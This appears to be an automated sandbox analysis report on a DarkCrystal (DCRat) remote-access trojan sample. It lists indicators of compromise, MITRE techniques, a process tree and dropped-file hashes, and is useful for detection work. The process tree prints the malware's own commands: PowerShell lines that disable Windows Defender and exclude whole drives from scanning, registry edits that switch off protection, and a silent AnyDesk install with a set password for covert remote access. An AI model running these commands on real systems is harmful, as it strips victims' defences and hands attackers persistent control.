dcrat | 28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479

Analysis

max time kernel
64s
max time network
153s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
12-01-2023 13:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

migrate.120.exe
Size

15.7MB
MD5

b27e540aef37c99f3cfd2766c2e61784
SHA1

c516b74daec17d1bc788c54433cf10899ee07e92
SHA256

28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
SHA512

641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
SSDEEP

393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX

Score

10^/10

dcrat discovery evasion infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe

DCRat payload 10 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
C:\programdata\dc.exe	dcrat
\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
behavioral1/memory/284-121-0x0000000000C40000-0x0000000000D4C000-memory.dmp	dcrat

Executes dropped EXE 9 IoCs

Processes:

1.exeany.exedc.exe1.exeComdriverSvc.exewsappz.exeAnyDesk.exeAnyDesk.exeAnyDesk.exe

pid process

1072 1.exe
1944 any.exe
1768 dc.exe
1368 1.exe
284 ComdriverSvc.exe
1388 wsappz.exe
1368 AnyDesk.exe
1520 AnyDesk.exe
1044 AnyDesk.exe

pid	process
1072	1.exe
1944	any.exe
1768	dc.exe
1368	1.exe
284	ComdriverSvc.exe
1388	wsappz.exe
1368	AnyDesk.exe
1520	AnyDesk.exe
1044	AnyDesk.exe

Loads dropped DLL 14 IoCs

Processes:

migrate.120.execmd.execmd.exewsappz.exe

pid	process
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
1996	migrate.120.exe
916	cmd.exe
916	cmd.exe
1764	cmd.exe
1388	wsappz.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1.exe1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 2 IoCs

Processes:

1.exe1.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1956 timeout.exe
1912 timeout.exe
1228 timeout.exe
1136 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1076 taskkill.exe
1328 taskkill.exe

pid	process
1956	timeout.exe
1912	timeout.exe
1228	timeout.exe
1136	timeout.exe

pid	process
1076	taskkill.exe
1328	taskkill.exe

Modifies registry class 16 IoCs

Processes:

wsappz.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\""	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exe1.exepowershell.exewsappz.exeAnyDesk.exepowershell.exe

pid	process
1936	powershell.exe
1512	powershell.exe
1072	1.exe
1072	1.exe
1072	1.exe
1072	1.exe
1856	powershell.exe
1388	wsappz.exe
1388	wsappz.exe
1368	AnyDesk.exe
1960	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowershell.exe1.exetaskkill.exetaskkill.exepowershell.exeComdriverSvc.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1072	1.exe
Token: SeAssignPrimaryTokenPrivilege	1072	1.exe
Token: SeIncreaseQuotaPrivilege	1072	1.exe
Token: 0	1072	1.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	284	ComdriverSvc.exe
Token: SeDebugPrivilege	1960	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

AnyDesk.exe

pid process

1520 AnyDesk.exe
1520 AnyDesk.exe
1520 AnyDesk.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

AnyDesk.exe

pid process

1520 AnyDesk.exe
1520 AnyDesk.exe
1520 AnyDesk.exe

pid	process
1520	AnyDesk.exe
1520	AnyDesk.exe
1520	AnyDesk.exe

pid	process
1520	AnyDesk.exe
1520	AnyDesk.exe
1520	AnyDesk.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

migrate.120.execmd.execmd.exedc.exeany.execmd.exenet.exenet.exe

description	pid	process	target process
PID 1996 wrote to memory of 1936	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1936	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1936	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1936	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1512	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1512	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1512	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1512	1996	migrate.120.exe	powershell.exe
PID 1996 wrote to memory of 1072	1996	migrate.120.exe	1.exe
PID 1996 wrote to memory of 1072	1996	migrate.120.exe	1.exe
PID 1996 wrote to memory of 1072	1996	migrate.120.exe	1.exe
PID 1996 wrote to memory of 1072	1996	migrate.120.exe	1.exe
PID 1996 wrote to memory of 1640	1996	migrate.120.exe	cmd.exe
PID 1996 wrote to memory of 1640	1996	migrate.120.exe	cmd.exe
PID 1996 wrote to memory of 1640	1996	migrate.120.exe	cmd.exe
PID 1996 wrote to memory of 1640	1996	migrate.120.exe	cmd.exe
PID 1996 wrote to memory of 1944	1996	migrate.120.exe	any.exe
PID 1996 wrote to memory of 1944	1996	migrate.120.exe	any.exe
PID 1996 wrote to memory of 1944	1996	migrate.120.exe	any.exe
PID 1996 wrote to memory of 1944	1996	migrate.120.exe	any.exe
PID 1640 wrote to memory of 1692	1640	cmd.exe	cmd.exe
PID 1640 wrote to memory of 1692	1640	cmd.exe	cmd.exe
PID 1640 wrote to memory of 1692	1640	cmd.exe	cmd.exe
PID 1640 wrote to memory of 1692	1640	cmd.exe	cmd.exe
PID 1996 wrote to memory of 1768	1996	migrate.120.exe	dc.exe
PID 1996 wrote to memory of 1768	1996	migrate.120.exe	dc.exe
PID 1996 wrote to memory of 1768	1996	migrate.120.exe	dc.exe
PID 1996 wrote to memory of 1768	1996	migrate.120.exe	dc.exe
PID 1692 wrote to memory of 1156	1692	cmd.exe	chcp.com
PID 1692 wrote to memory of 1156	1692	cmd.exe	chcp.com
PID 1692 wrote to memory of 1156	1692	cmd.exe	chcp.com
PID 1692 wrote to memory of 1156	1692	cmd.exe	chcp.com
PID 1768 wrote to memory of 1580	1768	dc.exe	WScript.exe
PID 1768 wrote to memory of 1580	1768	dc.exe	WScript.exe
PID 1768 wrote to memory of 1580	1768	dc.exe	WScript.exe
PID 1768 wrote to memory of 1580	1768	dc.exe	WScript.exe
PID 1692 wrote to memory of 1956	1692	cmd.exe	timeout.exe
PID 1692 wrote to memory of 1956	1692	cmd.exe	timeout.exe
PID 1692 wrote to memory of 1956	1692	cmd.exe	timeout.exe
PID 1692 wrote to memory of 1956	1692	cmd.exe	timeout.exe
PID 1944 wrote to memory of 860	1944	any.exe	cmd.exe
PID 1944 wrote to memory of 860	1944	any.exe	cmd.exe
PID 1944 wrote to memory of 860	1944	any.exe	cmd.exe
PID 1944 wrote to memory of 860	1944	any.exe	cmd.exe
PID 860 wrote to memory of 1656	860	cmd.exe	chcp.com
PID 860 wrote to memory of 1656	860	cmd.exe	chcp.com
PID 860 wrote to memory of 1656	860	cmd.exe	chcp.com
PID 860 wrote to memory of 1656	860	cmd.exe	chcp.com
PID 860 wrote to memory of 960	860	cmd.exe	net.exe
PID 860 wrote to memory of 960	860	cmd.exe	net.exe
PID 860 wrote to memory of 960	860	cmd.exe	net.exe
PID 860 wrote to memory of 960	860	cmd.exe	net.exe
PID 960 wrote to memory of 364	960	net.exe	net1.exe
PID 960 wrote to memory of 364	960	net.exe	net1.exe
PID 960 wrote to memory of 364	960	net.exe	net1.exe
PID 960 wrote to memory of 364	960	net.exe	net1.exe
PID 860 wrote to memory of 516	860	cmd.exe	net.exe
PID 860 wrote to memory of 516	860	cmd.exe	net.exe
PID 860 wrote to memory of 516	860	cmd.exe	net.exe
PID 860 wrote to memory of 516	860	cmd.exe	net.exe
PID 516 wrote to memory of 948	516	net.exe	net1.exe
PID 516 wrote to memory of 948	516	net.exe	net1.exe
PID 516 wrote to memory of 948	516	net.exe	net1.exe
PID 516 wrote to memory of 948	516	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\migrate.120.exe
"C:\Users\Admin\AppData\Local\Temp\migrate.120.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
PID:1368

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:1156

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
4⤵
PID:908

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
4⤵
PID:1328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
PID:1736

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\any.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:860

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:1656

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:364

C:\Windows\SysWOW64\net.exe
net stop TaskScs
4⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
5⤵
PID:948

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
PID:1936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:524

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
5⤵
- Loads dropped DLL
PID:1764

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1388

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c echo Pass32552
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Pass32552
5⤵
PID:1956

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --set-password
4⤵
- Executes dropped EXE
PID:1044

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
4⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
5⤵
PID:824

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --get-id
6⤵
PID:1440

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
4⤵
PID:1956

C:\Windows\SysWOW64\find.exe
find /n /v ""
5⤵
PID:1044

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
3⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\runtimeMonitor\PsYm20I.bat" "
4⤵
- Loads dropped DLL
PID:916

C:\runtimeMonitor\ComdriverSvc.exe
"C:\runtimeMonitor\ComdriverSvc.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:284

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1368

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1520

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
bd2f8be839bef1a9952570ec74b3571d

SHA1
0d3f3069f911d85a00556c98aaa13b8cf5bc1773

SHA256
d2525baf59e3dcadfd16f5fe9b678e4f5f55b41896e710e7c942a3f207a4fbf5

SHA512
01a38b425d272a2df760f0c0f48b8c349fb3972a6c4a1d4a18c76464456065c18b5abcb3b107c1fb3c0e656dc1544ad6f1d43c2d619d85cd1b132fc1f7b8c673

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
f68a7a5b2919b5456baf4cd3cd529b9e

SHA1
8ca56731048176d5da22f4a6b4cd1b02d685abd1

SHA256
8755314bd1f6275b584bb5b80391d0a653b66262d8082adc3f076ddcf9cbd997

SHA512
868e17647fe673a328b79af9a06a04bfe8e55226c0bbd2f630819fac2d95bc0465f3d1534b8570e3b49d3f9566d71ed865dc78cefacb8ab8028c352ee97cf736

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
58B

MD5
77ae1fc149007f8910f5d869c0c047b7

SHA1
3132b12bf5f45520497d7ed2392fc4a2448ab805

SHA256
904c374bb4bc06ce3c1d4ffb173199dfb93c17f3403d9a4fcf65c66639116912

SHA512
1ad9b1fc52bbd43c80b6d6354fb0bd3e1a1ffa1eb6e4991aa791cff180b12489c1a5649f1367cd31fea5f41a55c8045de1ff851931fbeb564f326364fe7b61b8

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b61787dbd624a3871f6471e7863b4272

SHA1
122d5c7f71051b3120032c06b2c59f36cf1f9b5b

SHA256
3566082f26a78466d3c23b695fde42f719eedaa1bae73f12122789cf5c033acb

SHA512
1f5bb4b0ca69ff279d184e96ae9efce680263fa8fc3ed577b1aebc9d878195470588e2db562521a9a190bc7c11c9c4a983c0445e1cc3c3b50ee48f4dbd792bd3

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b61787dbd624a3871f6471e7863b4272

SHA1
122d5c7f71051b3120032c06b2c59f36cf1f9b5b

SHA256
3566082f26a78466d3c23b695fde42f719eedaa1bae73f12122789cf5c033acb

SHA512
1f5bb4b0ca69ff279d184e96ae9efce680263fa8fc3ed577b1aebc9d878195470588e2db562521a9a190bc7c11c9c4a983c0445e1cc3c3b50ee48f4dbd792bd3

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b61787dbd624a3871f6471e7863b4272

SHA1
122d5c7f71051b3120032c06b2c59f36cf1f9b5b

SHA256
3566082f26a78466d3c23b695fde42f719eedaa1bae73f12122789cf5c033acb

SHA512
1f5bb4b0ca69ff279d184e96ae9efce680263fa8fc3ed577b1aebc9d878195470588e2db562521a9a190bc7c11c9c4a983c0445e1cc3c3b50ee48f4dbd792bd3

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b61787dbd624a3871f6471e7863b4272

SHA1
122d5c7f71051b3120032c06b2c59f36cf1f9b5b

SHA256
3566082f26a78466d3c23b695fde42f719eedaa1bae73f12122789cf5c033acb

SHA512
1f5bb4b0ca69ff279d184e96ae9efce680263fa8fc3ed577b1aebc9d878195470588e2db562521a9a190bc7c11c9c4a983c0445e1cc3c3b50ee48f4dbd792bd3

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
7ce9936e6ef1b9b0c8ca835a42fb4425

SHA1
86e114be9ee4da38429cb635e1ab4e8717b57a70

SHA256
89a99f8a0db85bf5b2ba01b676f2613164fb4f754773954c897191ea385c302c

SHA512
29b584b4f52ab9fd672a45e0027651a4e5a62aed1a96d28f87b91364f8511f828f62316362af124e0fb0a67383efbe64a5311eef7027dae8aa4053b174931d8e

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
7ce9936e6ef1b9b0c8ca835a42fb4425

SHA1
86e114be9ee4da38429cb635e1ab4e8717b57a70

SHA256
89a99f8a0db85bf5b2ba01b676f2613164fb4f754773954c897191ea385c302c

SHA512
29b584b4f52ab9fd672a45e0027651a4e5a62aed1a96d28f87b91364f8511f828f62316362af124e0fb0a67383efbe64a5311eef7027dae8aa4053b174931d8e

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
1005ccc23b5db140917b74bef5e69a36

SHA1
a59380731f3c781e1c6de5e1778fb212e5cd63f0

SHA256
eab3ca93557710f5d459ceab71d793cc2b624de5006bad9beae781ca9cfb9d38

SHA512
75d2d9f536ba286c6d5c4779a15ffff3c21f3ba425f2bd9878898cf6924b7d19dfc03e66a3c0e03f1cdd449a33414f172e19f1aef3c8e24e5616c86e2ae2db60

Download Submit
C:\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
70ffb61002b8ebb24ea348aef9fa0281

SHA1
3b082515906b1e0c1ae14aa0b2edffb9c985c2ba

SHA256
c61a2f9f1b88513aa6214c7a4fdaf392f160c89cb66dc7d007b16382ea4a6ed5

SHA512
6ca785a67e6a4cb7fcf8faa7e37299b20948d168ffb791e553f94bd9ebe08e08dd2db5b4d3ddcdf9756fc5fa9d41f9e6aa00beafd98b927448aed6f0d5c1ff30

Download Submit
C:\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
